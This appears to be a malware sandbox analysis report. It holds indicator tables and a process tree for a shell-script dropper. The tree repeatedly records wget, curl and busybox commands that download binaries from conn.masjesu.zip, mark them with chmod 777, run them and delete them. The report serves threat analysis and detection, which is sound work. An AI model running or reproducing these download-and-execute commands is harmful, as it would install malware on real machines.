N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg N/A
N/A /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 N/A
N/A /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb N/A
N/A /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE N/A
N/A /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm N/A
N/A /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO N/A
N/A /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM N/A
N/A /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY N/A
N/A /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB N/A
N/A /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi N/A
N/A /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A
N/A /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A
N/A /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF N/A
N/A /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 N/A
N/A /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb N/A
N/A /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE N/A
N/A /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm N/A
N/A /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg N/A
N/A /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO N/A
N/A /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM N/A
N/A /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY N/A
N/A /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB N/A
N/A /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi N/A
N/A /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /usr/bin/curl N/A
File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /usr/bin/curl N/A
File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /usr/bin/curl N/A
File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /usr/bin/curl N/A
File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /usr/bin/curl N/A
File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /usr/bin/curl N/A
File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /usr/bin/curl N/A
File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /usr/bin/curl N/A
File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /usr/bin/curl N/A
File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /usr/bin/curl N/A
File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /usr/bin/curl N/A
File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /usr/bin/curl N/A
File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /usr/bin/curl N/A
File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /usr/bin/curl N/A
File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /usr/bin/curl N/A
File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /usr/bin/curl N/A
File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/chmod

[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/rm

[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/chmod

[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23

[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/rm

[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/chmod

[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb

[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/rm

[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/chmod

[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE

[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/rm

[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/chmod

[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm

[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/rm

[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/chmod

[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO

[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/rm

[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/chmod

[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM

[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/rm

[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/chmod

[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY

[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/rm

[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/chmod

[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB

[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/rm

[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/chmod

[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi

[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/rm

[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/chmod

[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8

[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/rm

[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/chmod

[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF

[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/rm

[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/chmod

[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF

[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/rm

[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/chmod

[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23

[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/rm

[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/chmod

[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb

[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/rm

[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/chmod

[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE

[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/rm

[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/chmod

[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm

[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/rm

[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/chmod

[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/rm

[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/chmod

[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO

[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/rm

[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/busybox

